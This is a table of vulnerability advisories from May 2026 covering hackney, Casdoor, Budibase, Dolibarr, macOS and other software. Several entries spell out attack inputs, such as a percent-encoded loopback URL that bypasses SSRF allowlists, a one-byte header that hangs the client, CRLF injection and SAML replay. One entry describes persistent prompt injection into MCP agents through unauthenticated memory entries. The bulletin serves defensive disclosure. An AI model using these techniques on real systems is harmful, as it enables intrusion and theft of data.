| Apache Software Foundation--Apache Shiro | Apache Shiro's Jakarta EE module used the HTTP Referer header in certain cases to issue redirect after a user login. In affected versions, insufficient validation of this client-controlled value could allow an attacker to influence the redirect target in applications using the Jakarta EE module. This issue affects Apache Shiro from 2.0-alpha to 2.2.0, and 3.0.0-alpha-1, only when using shiro-jakarta-ee integration module. | 2026-05-25 | not yet calculated | CVE-2026-48589 | https://shiro.apache.org/security-reports.html#cve_2026_48589 |
| Apache Software Foundation--Apache Shiro Jakarta EE module | With valid login credentials, URL Redirection to Untrusted Site ('Open Redirect'), Server-Side Request Forgery (SSRF) vulnerability in Apache Shiro. This issue affects Apache Shiro from 2.0-alpha to 2.1.0, and 3.0.0-alpha-1, only when using the shiro-jakarta-ee integration module. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue by encrypting the cookie. After successful login, the Jakarta EE integration module uses the shiroSavedRequest cookie to redirect to a particular web page. This cookie was not validated, and can be forged to send an HTTP GET request from the server itself to an arbitrary URL taken from the cookie. | 2026-05-25 | not yet calculated | CVE-2026-44598 | https://shiro.apache.org/security-reports.html#cve_2026_44598 |
| Apache Software Foundation--Apache Syncope | Improper Isolation or Compartmentalization vulnerability in Apache Syncope. An administrator with adequate entitlements for Implementations can create a malicious Groovy class containing untrusted code reaching a non-sandboxed execution path via the class static initializer. This issue affects Apache Syncope: 3.0 through 3.0.16, 4.0 through 4.0.5, 4.1.0. Users are recommended to upgrade to version 4.0.6 / 4.1.1, which fix this issue by forcing even the static initializer in Groovy code to run in a sandbox. | 2026-05-25 | not yet calculated | CVE-2026-42782 | https://lists.apache.org/thread/b869ms0ofrd129f7tgsn9flxgv9ztg2r |
| Apache Software Foundation--Apache Syncope | Exposure of Sensitive Information Through Data Queries vulnerability in Apache Syncope. An administrator with adequate entitlements for Derived Schemas can create a malicious JEXL expression which allows any administrator with sufficient entitlements for User read to access User-related security-sensitive information. This issue affects Apache Syncope: 3.0 through 3.0.16, 4.0 through 4.0.5, 4.1.0. Users are recommended to upgrade to version 4.0.6 / 4.1.1, which fix this issue by further restricting the JEXL expression definition. | 2026-05-25 | not yet calculated | CVE-2026-42797 | https://lists.apache.org/thread/5y7d277sntyytrmxnx2tfjr9ftcpq1s6 |
| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. A malicious app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-43289 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. An app may be able to modify protected parts of the file system. | 2026-05-26 | not yet calculated | CVE-2025-43290 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. A malicious app may be able to gain root privileges. | 2026-05-26 | not yet calculated | CVE-2025-43306 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26. An app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-43451 | https://support.apple.com/en-us/125110 |
| Apple--macOS | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Tahoe 26. An app may be able to cause unexpected system termination. | 2026-05-26 | not yet calculated | CVE-2025-46280 | https://support.apple.com/en-us/125110 |
| Apple--macOS | A race condition was addressed with additional validation. This issue is fixed in macOS Sequoia 15.7, macOS Tahoe 26. An app may be able to gain root privileges. | 2026-05-26 | not yet calculated | CVE-2025-46284 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Tahoe 26. An app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-46307 | https://support.apple.com/en-us/125110 |
| AppLockZ--App Lock and Fingerprint Lock | AppLockZ App Lock and Fingerprint Lock (applock.passwordfingerprint.applockz) 4.2.11 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows (insecure navigation through exposed routes facilitates app control evasion, "I.N.T.E.R.F.A.C.E") via advertisement or browser intents, an attacker can evade lockscreen verification and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68711 | https://play.google.com/store/apps/details?id=applock.passwordfingerprint.applockz https://github.com/actuator/applock.passwordfingerprint.applockz https://github.com/actuator/applock.passwordfingerprint.applockz/blob/main/CVE-2025-68711 |
| ASUS--Armoury Crate | Incorrect permission assignment for a critical resource in Armoury Crate allows a local user to bypass the driver's validation mechanism, resulting in unauthorized read and write access to physical memory. Refer to the 'Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information. | 2026-05-29 | not yet calculated | CVE-2026-8070 | https://www.asus.com/security-advisory |
| ASUS--ASUS System Control Interface | An Incorrect Permission Assignment for Critical Resource vulnerability in ASUS System Control Interface allows a local user to elevate privileges to SYSTEM and execute arbitrary code via a crafted RPC call that bypasses the validation mechanism. Refer to the 'Security Update for ASUS System Control Interface' section on the ASUS Security Advisory for more information. | 2026-05-29 | not yet calculated | CVE-2026-7480 | https://www.asus.com/security-advisory/ |
| BackdropCMS--GDPR cookies module for Backdrop CMS | The GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration. | 2026-05-26 | not yet calculated | CVE-2025-71310 | https://backdropcms.org/security/sa-contrib-2025-013 |
| benoitc--hackney | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in benoitc hackney allows Excessive Allocation. The Alt-Svc response header parser in src/hackney_altsvc.erl does not guarantee forward progress. When parse_token/2 receives a non-token, non-whitespace, non-comma byte (e.g. !, @, =, ;), it returns the input unchanged. skip_comma/1 also returns the buffer unchanged when the first byte is not a comma. parse_entries/2 then recurses with identical data, creating a tight infinite tail-recursive loop that pins a scheduler at 100% CPU. The calling process never returns. The entry point parse_and_cache/3 is called synchronously in the connection process on every HTTP response. A single-byte Alt-Svc: ! response header is sufficient to trigger the hang; the header is fully controlled by any HTTP origin the client connects to. This issue affects hackney: from 2.0.0-beta.1 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47066 | https://github.com/benoitc/hackney/security/advisories/GHSA-6cp8-v795-jr2j https://cna.erlef.org/cves/CVE-2026-47066.html https://osv.dev/vulnerability/EEF-CVE-2026-47066 https://github.com/benoitc/hackney/commit/e548aba1f97ffa3f4750da7b772998fb78c01894 |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. The URL parser in src/hackney_url.erl converts every unrecognized URL scheme to a permanent BEAM atom via binary_to_atom/2. BEAM atoms are never garbage-collected and the atom table defaults to a hard limit of 1,048,576 entries. An attacker who can supply URLs with attacker-chosen scheme prefixes - directly as request targets, as configured webhook URLs, or via Location headers followed during redirects - can exhaust the atom table and crash the entire BEAM VM with system_limit. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47067 | https://github.com/benoitc/hackney/security/advisories/GHSA-9653-rcfr-5c62 https://cna.erlef.org/cves/CVE-2026-47067.html https://osv.dev/vulnerability/EEF-CVE-2026-47067 https://github.com/benoitc/hackney/commit/31f6f0e27e096ad88743dfded4f030a3ee74972e |
| benoitc--hackney | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in benoitc hackney allows HTTP Response Splitting. The hackney_cookie:setcookie/3 function in src/hackney_cookie.erl validates the Name and Value arguments against CRLF and control characters, but concatenates the domain and path options verbatim into the output iolist with no equivalent check. An attacker who controls either option - for example by supplying a Host header value forwarded as the cookie domain, or a request path forwarded as the cookie path - can inject a literal CRLF sequence and arbitrary additional Set-Cookie headers into the HTTP response. This issue affects hackney: from 0.9.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47069 | https://github.com/benoitc/hackney/security/advisories/GHSA-mp55-p8c9-rfw2 https://cna.erlef.org/cves/CVE-2026-47069.html https://osv.dev/vulnerability/EEF-CVE-2026-47069 https://github.com/benoitc/hackney/commit/8e02b99c28aea1b3fa2ddc0e66f51fe5bb0ac540 |
| benoitc--hackney | Sensitive Data Exposure vulnerability in benoitc hackney allows Retrieve Embedded Sensitive Data. The HTTP/3 redirect handler in src/hackney_h3.erl passes the original request headers unchanged to the redirect target without performing any cross-origin check. When a client issues an HTTP/3 request with follow_redirect enabled and includes Authorization or Cookie headers, a server responding with a 3xx redirect to a different host will cause the client to forward those credentials verbatim to the new origin. The main hackney.erl module has maybe_strip_auth_on_redirect/2 (guarded by the location_trusted option) to address CVE-2018-1000007, but hackney_h3.erl is missing this protection entirely. This issue affects hackney: from 3.1.1 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47070 | https://github.com/benoitc/hackney/security/advisories/GHSA-h73q-4w9q-82h4 https://cna.erlef.org/cves/CVE-2026-47070.html https://osv.dev/vulnerability/EEF-CVE-2026-47070 https://github.com/benoitc/hackney/commit/c58d5b50bade146360b85caf3dc8065807b08246 |
| benoitc--hackney | Uncontrolled Resource Consumption vulnerability in benoitc hackney allows Flooding. The SOCKS5 transport in src/hackney_socks5.erl correctly applies the caller-supplied timeout to the SOCKS5 negotiation phase, but then upgrades the connection to TLS using the two-argument form ssl:connect/2, which defaults to an infinite timeout. The Timeout value is in scope at the call site but is not forwarded. A hostile SOCKS5 proxy that completes the SOCKS5 handshake normally and then goes silent (or sends a partial TLS ServerHello and stalls) will cause the connecting process to block indefinitely, regardless of the connect_timeout or recv_timeout options supplied by the caller. This issue affects hackney: from 0.10.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47071 | https://github.com/benoitc/hackney/security/advisories/GHSA-gp9c-pm5m-5cxr https://cna.erlef.org/cves/CVE-2026-47071.html https://osv.dev/vulnerability/EEF-CVE-2026-47071 https://github.com/benoitc/hackney/commit/5ccdab725c561a6f03d05a51f2d0664f98236dae |
| benoitc--hackney | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in benoitc hackney allows HTTP Request/Response Splitting. The WebSocket upgrade code in src/hackney_ws.erl copies the host, path, headers (ExtraHeaders), and protocols options from the caller-supplied opts map into the internal #ws_data{} record in init/1 and then splices them verbatim into the raw HTTP/1.1 upgrade request by binary concatenation in do_handshake/1. No CRLF or NUL stripping is performed at any of these four injection sites. An attacker who controls any of these options - for example by forwarding URL components or header values from untrusted input into hackney_ws:start_link/1 - can inject arbitrary HTTP headers into the outbound WebSocket upgrade request, leading to header injection, credential spoofing toward the upstream server, log and cache poisoning, or request smuggling via intermediary proxies. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47072 | https://github.com/benoitc/hackney/security/advisories/GHSA-f9vr-g2g2-x9fg https://cna.erlef.org/cves/CVE-2026-47072.html https://osv.dev/vulnerability/EEF-CVE-2026-47072 https://github.com/benoitc/hackney/commit/52310ca807e7b48441ba0e9129171f535313fdd1 |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. The WebSocket client in src/hackney_ws.erl imposes no upper bound on memory consumption in three code paths. First, read_handshake_response/3 accumulates received bytes into a growing buffer with no size cap; the per-receive timeout resets on every chunk, so a server that streams bytes without ever sending \r\n\r\n causes the buffer to grow until memory is exhausted. Second, parse_payload/9 and parse_active_payload/8 do not validate the declared frame payload length against any limit; because RFC 6455 allows payload lengths up to 2^63-1 bytes, a server that announces a very large frame and dribbles bytes causes the accumulation buffer to grow until OOM. Third, the frag_buffer field in #ws_data{} accumulates continuation frames indefinitely; a server that sends an endless stream of non-final (nofin) fragmented frames without ever sending a final (fin) frame grows frag_buffer without bound. In all three cases the attacker only needs to control the WebSocket server the hackney client connects to, with no authentication or special client configuration required. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47073 | https://github.com/benoitc/hackney/security/advisories/GHSA-q8jg-fgj4-fphf https://cna.erlef.org/cves/CVE-2026-47073.html https://osv.dev/vulnerability/EEF-CVE-2026-47073 https://github.com/benoitc/hackney/commit/ce0109e2970ace6e20ff29bae9d05c3ac22ec6dc |
| benoitc--hackney | Improper Neutralization of CRLF Sequences vulnerability in benoitc hackney allows HTTP Request Splitting. hackney does not percent-encode carriage return (\r) or line feed (\n) characters in the URL query component before constructing the HTTP/1.1 request target. Characters outside the grammar defined in RFC 3986 Section 3.4 must be percent-encoded, but hackney_url:make_url/3 passes the query binary directly without validation or escaping. An attacker who can control all or part of a URL passed to hackney can inject raw CRLF sequences into the query string, which are then sent as HTTP line breaks in the request target. This enables injection of arbitrary HTTP headers or splitting of the HTTP request. This issue affects hackney: from 0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47075 | https://github.com/benoitc/hackney/security/advisories/GHSA-j9wq-vxxc-94wf https://cna.erlef.org/cves/CVE-2026-47075.html https://osv.dev/vulnerability/EEF-CVE-2026-47075 https://github.com/benoitc/hackney/commit/ca73dd0aba0ed557449c18288bf07241671a43c9 |
| benoitc--hackney | Interpretation Conflict vulnerability in benoitc hackney allows Server Side Request Forgery. hackney_url:normalize/2 URL-decodes the host component after the URL has been parsed into a #hackney_url{} record. OTP's uri_string:parse/1 and inet:parse_address/1 do not decode percent-escapes in the host, so a URL such as http://%31%32%37%2E%30%2E%30%2E%31/ is seen by a caller's allowlist validator with host %31%32%37%2E%30%2E%30%2E%31 (not an IP address), which passes the allowlist check. hackney's normalizer then decodes the host to 127.0.0.1 and opens a TCP connection to loopback. Because hackney:request/5 always calls hackney_url:normalize/2 with no opt-out, every request that takes a binary or list URL is affected. The same technique reaches cloud instance metadata services (169.254.169.254), RFC1918 networks, and any admin interface listening on localhost. This issue affects hackney: from 0.13.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47076 | https://github.com/benoitc/hackney/security/advisories/GHSA-pj7v-xfvx-wmjq https://cna.erlef.org/cves/CVE-2026-47076.html https://osv.dev/vulnerability/EEF-CVE-2026-47076 https://github.com/benoitc/hackney/commit/452620a92ec1da2e6b4862a049a2a4f04b42068f |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. hackney_h3:await_response_loop/6 accumulates the HTTP/3 response body in memory without any size cap. The after Timeout clause is a per-message inactivity timer that resets on every received chunk, housekeeping message, or settings frame - it is not a wall-clock deadline. A malicious HTTP/3 server that emits one small chunk every Timeout - 1 ms with Fin = false and never sends a final frame keeps the loop alive indefinitely while the accumulation buffer grows linearly without bound, eventually exhausting the BEAM process heap and causing an out-of-memory condition. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47077 | https://github.com/benoitc/hackney/security/advisories/GHSA-jq4m-q6p2-8gwc https://cna.erlef.org/cves/CVE-2026-47077.html https://osv.dev/vulnerability/EEF-CVE-2026-47077 https://github.com/benoitc/hackney/commit/3d25f9fea26c90609de9d64366fedfe5065413bc |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.08 for Perl extract symlinks with attacker-controlled targets outside the extraction directory. _make_special_file() passes the tar header's linkname to symlink() without validating it against absolute paths or .. segments. The secure-extract mode check that guards regular file extraction does not cover the symlink target. A subsequent open through the extracted name reads or writes the attacker-chosen path. | 2026-05-26 | not yet calculated | CVE-2026-42496 | https://github.com/jib/archive-tar-new/commit/17c873492a05eddc0de18c1485e0b2cccd5a9158.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.08/changes https://www.cve.org/CVERecord?id=CVE-2026-42497 |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.08 for Perl extract hardlinks to attacker-controlled paths outside the extraction directory. _make_special_file() passes the tar header's linkname to link() without validating it against absolute paths or .. segments, creating a hardlink that shares the victim file's inode. A subsequent write through the extracted name modifies the victim file, and the post-extraction chmod, chown, and utime block in _extract_file() (guarded only against symlinks via -l) applies the tar header's mode, owner, and timestamps to the shared inode during extraction alone. | 2026-05-26 | not yet calculated | CVE-2026-42497 | https://github.com/jib/archive-tar-new/commit/17c873492a05eddc0de18c1485e0b2cccd5a9158.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.08/changes https://www.cve.org/CVERecord?id=CVE-2026-42496 |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.10 for Perl allow memory exhaustion via an attacker-controlled entry size field in the tar header. _read_tar() reads each entry's payload with $handle->read($$data, $block), where $block is derived from the entry's 12-byte size field in the tar header with no upper bound on that value. A crafted header declaring a multi-gigabyte size causes Perl to allocate a scalar of that size. | 2026-05-26 | not yet calculated | CVE-2026-9538 | https://github.com/jib/archive-tar-new/commit/f9af01426038e29d9578825a0cd3626946ab08c7.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.10/changes |
| Bolt--Bolt CMS | Bolt CMS through 3.7.0 allows SQL Injection in the 'order' parameter of the content listing pages. An authenticated attacker with low-level privileges can exploit this through the OrderDirective component. This allows for the extraction of sensitive information. | 2026-05-29 | not yet calculated | CVE-2026-39229 | https://github.com/bolt/bolt https://boltcms.io/ https://github.com/Tonoss-412/My-CVE/blob/main/CVE-2026-39229.md |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the executeQuery automation step in Budibase accepts a queryId from automation step inputs and passes it directly to the query execution controller without additional validation. When combined with a REST datasource configured to target internal infrastructure, this creates a server-side request forgery path where automation execution causes the Budibase server to make outbound HTTP requests to attacker-influenced destinations. The automation output then returns the response, potentially exposing internal service data. This vulnerability is fixed in 3.39.0. | 2026-05-27 | not yet calculated | CVE-2026-48128 | https://github.com/Budibase/budibase/security/advisories/GHSA-6964-pp88-6wp9 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.3, the VectorDB configuration endpoint in Budibase accepts a host parameter that undergoes no validation against internal IP ranges, reserved hostnames, or URL schemes. Any authenticated user with builder-level access can supply an arbitrary host value such as 169.254.169.254 or localhost, causing the server to initiate outbound TCP connections to internal network addresses or cloud metadata endpoints on their behalf. This vulnerability is fixed in 3.35.3. | 2026-05-27 | not yet calculated | CVE-2026-48148 | https://github.com/Budibase/budibase/security/advisories/GHSA-cv96-5348-p5p8 |
| bzip2--bzip2 | bzip2 contains an off‑by‑one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out‑of‑bounds write to a global buffer, resulting in memory corruption and a crash (denial of service). This issue was fixed in bzip2 patch 35d122a3df8b0cc4082a4d89fdc6ee99f375fe67 | 2026-05-28 | not yet calculated | CVE-2026-42250 | https://cert.pl/en/posts/2026/05/CVE-2026-42250/ https://sourceware.org/bzip2/ https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/ https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability that allows an attacker to bypass authentication by supplying an arbitrary signing certificate. The buildSpCertificateStore function extracts the X.509 certificate directly from the incoming SAMLResponse instead of using the trusted pre-configured Identity Provider certificate, allowing an attacker to forge assertions signed with an attacker-controlled key. | 2026-05-28 | not yet calculated | CVE-2026-9090 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a logic flaw in the social‑login binding flow that allows users to bypass configured MFA requirements. The binding‑rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement. | 2026-05-28 | not yet calculated | CVE-2026-9091 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability involving unverified email binding that may enable account takeover. The getExistUserByBindingRule function matches users by email without checking the email_verified claim from upstream providers; the idp.UserInfo struct does not even include an EmailVerified field. An attacker can supply an unverified email claim from an upstream provider to take over accounts that use the same email address. | 2026-05-28 | not yet calculated | CVE-2026-9092 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | In Casdoor versions 2.362.0 and earlier, the SAML service provider implementation does not validate the AudienceRestriction element in SAML assertions. The buildSp function in object/saml_sp.go never sets AudienceURI on the gosaml2 SAMLServiceProvider struct and never inspects WarningInfo.NotInAudience. This allows assertions issued for other service providers to be accepted by Casdoor. | 2026-05-28 | not yet calculated | CVE-2026-9093 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability enabling cross-organization token exchange. The GetTokenExchangeToken function in object/token_oauth.go validates JWT signatures but does not verify that the token's user belongs to the same organization as the target application. This can result in privilege escalation across organizational boundaries. | 2026-05-28 | not yet calculated | CVE-2026-9094 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier map SAML assertions to user sessions without replay protection. The ParseSamlResponse() function in object/saml_sp.go calls sp.RetrieveAssertionInfo() and immediately maps the result to a user session. There is no assertion ID cache, OneTimeUse condition enforcement, or replay detection anywhere in the SAML SP code path. As a result, an attacker can replay a previously captured SAML assertion to obtain an authenticated session for the assertion's subject, including administrator accounts, without needing the user's password or MFA credentials. | 2026-05-28 | not yet calculated | CVE-2026-9095 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier do not enforce SAML assertion time bounds. The gosaml2 library reports all time-validation results, including NotOnOrAfter and NotBefore, in the assertionInfo.WarningInfo field. However, ParseSamlResponse() never reads this field, meaning that time bounds are computed by the library but silently discarded before the user session is issued. | 2026-05-28 | not yet calculated | CVE-2026-9096 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier do not verify that a JWT used for token exchange is still active. The GetTokenExchangeToken() function in object/token_oauth.go validates the JWT signature and parses its claims, but never queries the Token table to verify whether the subject token has been revoked or invalidated. Because the revocation check is entirely absent, administrators are unable to terminate active sessions or revoke compromised tokens. | 2026-05-28 | not yet calculated | CVE-2026-9097 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | In Casdoor versions 2.362.0 and earlier, the SAML callback handler in controllers/auth.go accepts any well-formed SAMLResponse sent to /api/acs without verifying that it corresponds to an AuthnRequest previously issued by Casdoor. Additionally, if an administrator disables or deletes an IdP (Identity Provider) after a SAML flow has started, the handler still processes the response using the provider snapshot loaded at the start of the request. As a result, an attacker controlling a registered upstream IdP can send unsolicited SAML responses, or replay a legitimately captured response in a different session or after the original flow has ended. In both cases, Casdoor accepts the response and issues a session, enabling persistent unauthorized access. | 2026-05-28 | not yet calculated | CVE-2026-9098 | https://kb.cert.org/vuls/id/780781 |
| cinnyapp--cinny | Cinny is a Matrix client. Prior to 4.10.3, a remote authenticated attacker who shares a room with a victim and has permissions to create room emotes (for example in a DM) can cause the victim's client to send their Matrix access token to an attacker-controlled server. This occurs when the victim opens the emoji or sticker picker for the room containing a malicious emote pack. This is caused by an incorrect fallback in EmojiBoard that uses untrusted pack.meta.avatar (user-controlled) without converting/validating it as an MXC URL, allowing arbitrary HTTP(S) URLs to be used. In addition, the service worker attaches the user's Authorization bearer token to all outbound GET requests whose URL contains /_matrix/client/v1/media/download or /_matrix/client/v1/media/thumbnail without verifying that the request host matches the configured homeserver origin. An attacker-controlled URL containing those path fragments and permissive CORS will receive the victim's Authorization header (access token). This vulnerability is fixed in 4.10.3. | 2026-05-27 | not yet calculated | CVE-2026-42553 | https://github.com/cinnyapp/cinny/security/advisories/GHSA-j944-w549-3453 https://github.com/cinnyapp/cinny/releases/tag/v4.10.3 |
| cloudnative-pg--cloudnative-pg | CloudNativePG is a platform designed to manage PostgreSQL databases within Kubernetes environments. Prior to 1.29.1 and 1.28.3, the CloudNativePG metrics exporter opens its PostgreSQL connection as the postgres superuser via the pod-local Unix socket, then demotes the session with SET ROLE pg_monitor. SET ROLE changes only current_user; session_user remains postgres. Any SQL expression evaluated inside the scrape session can invoke RESET ROLE to recover real superuser privileges, then use COPY ... TO PROGRAM to spawn an OS-level subprocess as the postgres user inside the primary pod. The READ ONLY transaction flag does not block this; it gates writes to database state, not external processes. This vulnerability is fixed in 1.29.1 and 1.28.3. | 2026-05-28 | not yet calculated | CVE-2026-44477 | https://github.com/cloudnative-pg/cloudnative-pg/security/advisories/GHSA-423p-g724-fr39 https://github.com/cloudnative-pg/cloudnative-pg/pull/10576 |
| cnighswonger--claude-code-cache-fix | claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2. | 2026-05-27 | not yet calculated | CVE-2026-45136 | https://github.com/cnighswonger/claude-code-cache-fix/security/advisories/GHSA-g3xq-3gmv-qq8g https://github.com/cnighswonger/claude-code-cache-fix/issues/108 https://github.com/cnighswonger/claude-code-cache-fix/pull/110 |
| CP Plus--Wi-Fi Camera CP-E38Q, CP-E48Q, CP-E25Q, CP-E35Q, CP-E45Q, CP-E28Q, CP-E21Q, CP-E31Q, CP-E41Q, CP-E24Q, CP-Z43Q, CP-E34Q, CP-E44Q, CP-T31Q, CP-V48Q, CP-V41Q, CP-Z45Q | This vulnerability exists in CP Plus Wi-Fi Camera due to improper protection of sensitive information in runtime memory. An attacker with physical access could exploit this vulnerability by accessing the UART interface and performing memory extraction to obtain sensitive information, including cryptographic private keys, Wi-Fi credentials and configuration data stored in RAM of the targeted device. Successful exploitation of this vulnerability could allow unauthorized access to encrypted communications and connected wireless network of the targeted device. | 2026-05-25 | not yet calculated | CVE-2026-9274 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0266 |
| Craft--CMS 5.9.5 | Craft CMS 5.9.5 and earlier contains a Missing Authorization vulnerability in the migrate endpoint (/actions/app/migrate). | 2026-05-27 | not yet calculated | CVE-2026-31266 | https://github.com/craftcms/cms https://github.com/0xrixet/cms-security-poc |
| creatorsofcode--simplephp | A stored cross-site scripting (XSS) vulnerability exists in the /admin/config-module.php component of creatorsofcode simplephp at GitHub commit 5184cff (latest as of 2026-02-27) and is triggered by injecting a crafted payload. | 2026-05-27 | not yet calculated | CVE-2026-38931 | http://creatorsofcode.com http://simplephp.com https://moworn.github.io/post/cve-2026-38931/ |
| D-Link Corporation--DWR-X1820 | The D-Link DWR-X1820 router uses a weak default password generated from its IMEI number and does not require users to change it. An attacker who knows how passwords are generated can easily recover the default password if they have the device IMEI number. This issue was fixed in version 1.00B16CP. | 2026-05-28 | not yet calculated | CVE-2026-4377 | https://cert.pl/posts/2026/05/CVE-2026-4377 https://www.dlink.com/pl/pl/products/dwr-1820-cp#support |
| Dataojitori--nocturne_memory | Nocturne Memory is a lightweight, rollbackable, and visual Long-Term Memory Server for MCP Agents. Prior to 2.4.1, when API_TOKEN is unset or empty, the BearerTokenAuthMiddleware bypasses authentication for all HTTP requests. Combined with the default 0.0.0.0 host binding and CORS allow_origins=["*"], operators following the Docker setup without explicitly setting API_TOKEN expose the full Knowledge-Graph read/write API to any LAN-reachable client. An attacker on the same network can read, write, or delete all memory entries - including system://boot and core://* URIs that auto-load into downstream agent sessions, enabling persistent prompt-injection. This vulnerability is fixed in 2.4.1. | 2026-05-27 | not yet calculated | CVE-2026-44830 | https://github.com/Dataojitori/nocturne_memory/security/advisories/GHSA-crr4-xrj9-ww8g |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.19.0 and earlier, the protectedProcedure middleware only verifies the user is authenticated - it does NOT enforce organization scoping. Each endpoint must individually verify the resource's org matches the session's activeOrganizationId. This affects the following endpoints: allByType, killProcess, and removeDeployment in deployment.ts; delete in rollbacks.ts; create, one, update, remove, manualBackupPostgres, MySql, Mariadb, Mongo, Compose, WebServer, and listBackupFiles in backup.ts; list, one, delete, update, runManually, and restoreVolumeBackupWithLogs in volume-backups.ts; getNodes, removeWorker, addWorker, and addManager in cluster.ts; and create in mount.ts. | 2026-05-29 | not yet calculated | CVE-2026-43917 | https://github.com/Dokploy/dokploy/security/advisories/GHSA-f8wj-5c4w-frhg |
| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via htdocs/core/actions_addupdatedelete.inc.php. | 2026-05-27 | not yet calculated | CVE-2026-37711 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-grw9-6m4w-mhcq https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via the call_user_func_array() call in the "function" job type in htdocs/cron/class/cronjob.class.php. | 2026-05-27 | not yet calculated | CVE-2026-37712 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-c2jp-w9cj-6cx4 https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
